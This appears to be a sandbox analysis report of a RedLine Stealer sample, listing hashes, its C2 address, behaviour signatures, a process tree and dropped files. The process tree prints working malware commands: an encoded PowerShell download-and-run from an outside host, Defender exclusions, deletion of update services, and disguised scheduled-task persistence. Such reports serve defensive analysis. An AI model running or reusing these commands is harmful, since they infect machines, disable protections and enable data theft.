Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    02/01/2023, 13:11

General

  • Target

    9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe

  • Size

    119KB

  • MD5

    8768624262961d13c13c3d59a7483dd4

  • SHA1

    9b1a7106c9059379d3e50abf93d63bc156b81cc1

  • SHA256

    421fb3c3e9b2d45d1a831d5a3cf1e7a6574dae2cfc110c75a8688b023ad723d6

  • SHA512

    44ab5a6b5e42ff38eee5ea516f36c4962634412335f3a78132d129972fc9038d9b9d4d594b7dfff19fc66d050012cbbbf9e316521ce45159a9caa2eb3f40201d

  • SSDEEP

    3072:iISDRIJX/nbVdzrz5XhBWJekHzTUuAngc1I5yHWXKc:o14/nzVhBYHMNHWXKc

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 10 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:460
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:584
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k NetworkService
            2⤵
              PID:284
            • C:\Windows\system32\sppsvc.exe
              C:\Windows\system32\sppsvc.exe
              2⤵
                PID:1180
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                2⤵
                  PID:528
                • C:\Windows\system32\taskhost.exe
                  "taskhost.exe"
                  2⤵
                    PID:1276
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                    2⤵
                      PID:600
                    • C:\Windows\System32\spoolsv.exe
                      C:\Windows\System32\spoolsv.exe
                      2⤵
                        PID:112
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs
                        2⤵
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        PID:872
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {977BE890-19F4-451E-B0FF-F3CB782B4649} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                            PID:1044
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+'e'+'r'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                              4⤵
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:548
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+'ale'+[Char](114)+''+[Char](115)+''+'t'+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                              4⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2044
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {C792CC26-C996-4931-A49B-AC8D49D18560} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
                            3⤵
                              PID:1680
                              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                4⤵
                                • Executes dropped EXE
                                PID:1752
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService
                            2⤵
                              PID:824
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                              2⤵
                                PID:796
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                2⤵
                                  PID:748
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k RPCSS
                                  2⤵
                                    PID:664
                                • C:\Windows\system32\winlogon.exe
                                  winlogon.exe
                                  1⤵
                                    PID:416
                                    • C:\Windows\System32\dllhost.exe
                                      C:\Windows\System32\dllhost.exe /Processid:{2307676a-cea9-45b0-8e38-68daa703bb17}
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1700
                                  • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                    wmiadap.exe /F /T /R
                                    1⤵
                                      PID:1976
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1404
                                      • C:\Users\Admin\AppData\Local\Temp\9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe"
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of WriteProcessMemory
                                        PID:1972
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1560
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
                                            4⤵
                                            • Blocklisted process makes network request
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:1200
                                            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1036
                                            • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of WriteProcessMemory
                                              PID:892
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                6⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1616
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 116
                                                6⤵
                                                • Loads dropped DLL
                                                • Program crash
                                                PID:1500
                                            • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1328
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:856
                                            • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                              "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                              5⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in Drivers directory
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1988
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 52
                                          3⤵
                                          • Program crash
                                          PID:1472
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                        2⤵
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1600
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                        2⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1744
                                        • C:\Windows\System32\sc.exe
                                          sc stop UsoSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:620
                                        • C:\Windows\System32\sc.exe
                                          sc stop WaaSMedicSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:1876
                                        • C:\Windows\System32\sc.exe
                                          sc stop wuauserv
                                          3⤵
                                          • Launches sc.exe
                                          PID:1312
                                        • C:\Windows\System32\sc.exe
                                          sc stop bits
                                          3⤵
                                          • Launches sc.exe
                                          PID:576
                                        • C:\Windows\System32\sc.exe
                                          sc stop dosvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:812
                                        • C:\Windows\System32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                          3⤵
                                            PID:1116
                                          • C:\Windows\System32\reg.exe
                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                            3⤵
                                              PID:276
                                            • C:\Windows\System32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                              3⤵
                                              • Modifies security service
                                              PID:1920
                                            • C:\Windows\System32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                              3⤵
                                                PID:1752
                                              • C:\Windows\System32\reg.exe
                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                3⤵
                                                  PID:1376
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                2⤵
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1072
                                                • C:\Windows\system32\schtasks.exe
                                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                  3⤵
                                                  • Creates scheduled task(s)
                                                  PID:1648
                                              • C:\Windows\System32\dialer.exe
                                                C:\Windows\System32\dialer.exe
                                                2⤵
                                                  PID:1704
                                              • C:\Windows\system32\Dwm.exe
                                                "C:\Windows\system32\Dwm.exe"
                                                1⤵
                                                  PID:1356
                                                • C:\Windows\system32\lsm.exe
                                                  C:\Windows\system32\lsm.exe
                                                  1⤵
                                                    PID:484
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "19799649392031214888441386480-9772096501720666026-912227207-872295661-417062646"
                                                    1⤵
                                                      PID:1200

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                      Filesize

                                                      674KB

                                                      MD5

                                                      e479ecb1802253a4c94767c8af306baf

                                                      SHA1

                                                      846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                      SHA256

                                                      b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                      SHA512

                                                      b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      129b8710b67c8ac0609138c4512798fd

                                                      SHA1

                                                      a70aaf74a9264270365b5ce0e07d01717107bfdc

                                                      SHA256

                                                      5f46bae4226852a34b5cb29c141cefccc81e3bf3739278be8765a960e48a4ecd

                                                      SHA512

                                                      d9ba7be69a2e6d8bd968c6185652e6ff493735c1ad33d754021463b8ebec7cfa5c82bcc81a7b87e9e711b64c1c9c17ec37543c50b8abbc72c2e117d7577b1a7e

                                                    • C:\Windows\System32\Tasks\Telemetry Logging

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      3e010df6b7c22b8b58bf435d28b3a65f

                                                      SHA1

                                                      362a777d238000f8a41a6e2ae8c93a8df55855b2

                                                      SHA256

                                                      7305e1356c1589ed91c2c9d2df1a87f2934cedb330a4451f679da45fe339fc83

                                                      SHA512

                                                      aac8b1189c22379bad3e6e83bef0a842243a9721c3e06fdac5c0ec8fa4ab6b0076e07e0a3e5eb44c2d993bc9893acff37f1e04e121053162922aae9ef43c91d7

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • \Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • \Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

